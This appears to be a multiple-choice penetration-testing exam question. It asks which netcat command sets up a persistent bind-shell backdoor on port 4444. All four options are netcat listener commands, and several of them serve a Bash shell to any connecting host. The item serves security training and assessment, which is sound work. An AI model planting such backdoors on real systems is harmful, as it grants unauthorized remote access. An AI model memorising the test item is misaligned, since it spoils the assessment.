A penetration tester is tasked with establishing a simple backdoor on a compromised Linux machine to maintain access for future exploitation. The tester has decided to use a commonly available network utility to listen on an arbitrary port for incoming connections. Which of the following commands should the tester use to create a persistent listening backdoor on port 4444 that executes a Bash shell for any connecting IP?
nc -lp 4444 -c bash
nc -w3 -lp 4444
nc -lkp 4444 -e /bin/bash
nc -u -l 4444 -e /bin/bash